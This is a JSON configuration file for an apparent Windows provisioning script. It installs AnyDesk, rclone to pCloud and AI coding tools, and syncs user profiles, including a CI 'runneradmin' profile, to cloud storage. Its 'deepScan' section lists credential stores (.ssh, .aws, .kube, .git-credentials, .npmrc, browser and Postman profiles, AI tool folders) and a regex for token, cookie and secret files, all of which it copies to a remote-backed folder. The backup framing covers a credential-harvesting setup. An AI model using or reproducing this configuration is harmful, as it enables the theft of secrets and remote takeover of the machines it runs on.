{
    "backupDrive": "C:\\pcloud",
    "backupRoot": "C:\\pcloud\\Backup",
    "pcloudRemote": "pcloud:",
    "rcloneConfigDir": "%APPDATA%\\rclone",
    "rcloneConfigFile": "%APPDATA%\\rclone\\rclone.conf",
    "dataRepo": "Data",
    "dataRepoLocalPath": "%TEMP%\\github-data",
    "anydesk": {
        "user": "Bullettemporary",
        "passwordEnv": "RDP_PASS"
    },
    "performance": {
        "robocopyIPG": 10,
        "highPriorityProcesses": [
            "mstsc",
            "Tailscale",
            "AnyDesk",
            "svchost"
        ],
        "lowPriorityProcesses": [
            "rclone"
        ],
        "rclone": {
            "vfsCacheMode": "writes",
            "vfsCacheMaxSize": "2G",
            "vfsWriteBack": "5s",
            "dirCacheTime": "72h",
            "pollInterval": "0s",
            "bufferSize": "128M"
        }
    },
    "deepScan": {
        "enabled": true,
        "remoteRoot": "C:\\pcloud\\Backup\\DeepScan",
    "scanRoots": [
        "%USERPROFILE%",
        "%APPDATA%",
        "%LOCALAPPDATA%",
        "%TEMP%",
        "%ProgramData%"
    ],
    "targetDirs": [
        ".env",
        ".ssh",
        ".aws",
        ".azure",
        ".config",
        ".docker",
        ".kube",
        ".git-credentials",
        ".npmrc",
        ".netrc",
        ".wgetrc",
        ".curlrc",
        "npm",
        "Code",
        "Google",
        "Microsoft\\Edge",
        "Mozilla",
        "Postman",
        "claude",
        "opencode",
        "AnyDesk"
    ],
        "tokenFileRegex": "(token|session|cookie|credential|secret|auth|login)",
        "tokenFileExtensions": [
            ".json",
            ".txt",
            ".cfg",
            ".conf",
            ".ini",
            ".env",
            ".yaml",
            ".yml"
        ],
        "excludeDirs": [
            "node_modules",
            ".git",
            "WinSxS",
            "Package Cache",
            "$Recycle.Bin",
            "SysWOW64",
            "System32",
            "Windows"
        ],
        "maxDepth": 4,
        "maxScanFiles": 3000,
        "maxFileSizeMB": 10
    },
    "tools": {
        "git": {
            "wingetId": "Git.Git",
            "fallbackUrl": "https://github.com/git-for-windows/git/releases/download/v2.47.1.windows.2/Git-2.47.1.2-64-bit.exe"
        },
        "node": {
            "wingetId": "OpenJS.NodeJS.LTS"
        },
        "anydesk": {
            "downloadUrl": "https://download.anydesk.com/AnyDesk.exe",
            "installDir": "C:\\Program Files (x86)\\AnyDesk",
            "binary": "%ProgramFiles(x86)%\\AnyDesk\\AnyDesk.exe"
        },
        "claudeCode": {
            "npmPackage": "@anthropic-ai/claude-code"
        },
        "openCode": {
            "npmPackage": "opencode"
        },
        "antigravity": {
            "downloadUrl": "https://edgedl.me.gvt1.com/edgedl/release2/j0qc3/antigravity/stable/2.1.1-6123990880747520/windows-x64/Antigravity%20IDE.exe",
            "binary": "%LocalAppData%\\Programs\\Antigravity\\Antigravity.exe"
        },
        "rclone": {
            "installDir": "C:\\rclone",
            "downloadUrl": "https://downloads.rclone.org/v1.75.0/rclone-v1.75.0-windows-amd64.zip"
        },
        "winfsp": {
            "downloadUrl": "https://github.com/winfsp/winfsp/releases/download/v2.1/winfsp-2.1.25156.msi"
        }
    },
    "syncPaths": {
        "claude": {
            "local": "%USERPROFILE%\\.claude",
            "remote": "C:\\pcloud\\Backup\\.claude"
        },
        "workspace": {
            "local": "%USERPROFILE%\\Documents\\Workspace",
            "remote": "C:\\pcloud\\Backup\\Workspace"
        },
        "anydesk": {
            "local": "%ProgramData%\\AnyDesk",
            "remote": "C:\\pcloud\\Backup\\AnyDesk"
        },
        "rdp-profile": {
            "local": "%SystemDrive%\\Users\\Bullettemporary",
            "remote": "C:\\pcloud\\Backup\\Users\\Bullettemporary",
            "excludeDirs": [
                "Temp",
                "node_modules",
                ".git",
                "$RECYCLE.BIN"
            ]
        },
        "runner-profile": {
            "local": "%SystemDrive%\\Users\\runneradmin",
            "remote": "C:\\pcloud\\Backup\\Users\\runneradmin",
            "excludeDirs": [
                "Temp",
                "node_modules",
                ".git",
                "$RECYCLE.BIN"
            ]
        }
    }
}
